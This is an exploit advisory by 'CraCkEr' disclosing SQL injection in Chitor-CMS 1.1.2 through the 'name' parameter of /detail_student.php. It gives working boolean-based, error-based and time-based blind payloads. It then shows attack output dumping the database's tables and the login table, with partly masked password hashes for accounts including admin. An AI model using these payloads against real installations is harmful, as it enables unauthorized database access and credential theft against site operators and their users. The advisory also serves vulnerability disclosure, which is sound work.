┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://github.com/waqaskanju/Chitor-CMS │ │ Vendor : Waqas Ahmad │ │ Software : Chitor-CMS 1.1.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /detail_student.php /detail_student.php?name=[SQLI]&search=Search GET parameter 'name' is vulnerable to SQLI --- Parameter: name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: name=123' AND 7885=7885#&search=Search Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search --- GET parameter 'name' is vulnerable to SQLI [+] Starting the Attack fetching current database current database: ''**********_chitor_db' fetching tables for database: '**********_chitor_db' Database: **********_chitor_db [12 tables] +-----------------+ | position | | class_subjects | | employees | | login | | marks | | school_classes | | schools | | setting | | students_info | | subject_teacher | | subjects | | tab_index | +-----------------+ fetching columns for table 'login' in database '**********_chitor_db' Table: login [5 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | Password | varchar(256) | | Status | int(11) | | Employee_Id | int(11) | | Id | int(11) | | User_Name | varchar(30) | +-------------+--------------+ fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db' Table: login [3 entries] +----+----------+------------------------------------------+-------------+------------+ | Id | Status | Password | Employee_Id | User_Name | +----+----------+------------------------------------------+-------------+------------+ | 1 | 1 | *****1a7fdd83dd1e2a309ce759***** (****) | 1 | Guest | | 2 | 1 | *****82fb3cee50d9272ba79822***** | 2 | **qa*kan** | | 3 | 1 | *****f297a57a5a743894a0e4a8***** (****) | 3 | admin | +----+----------+------------------------------------------+-------------+------------+ [-] Done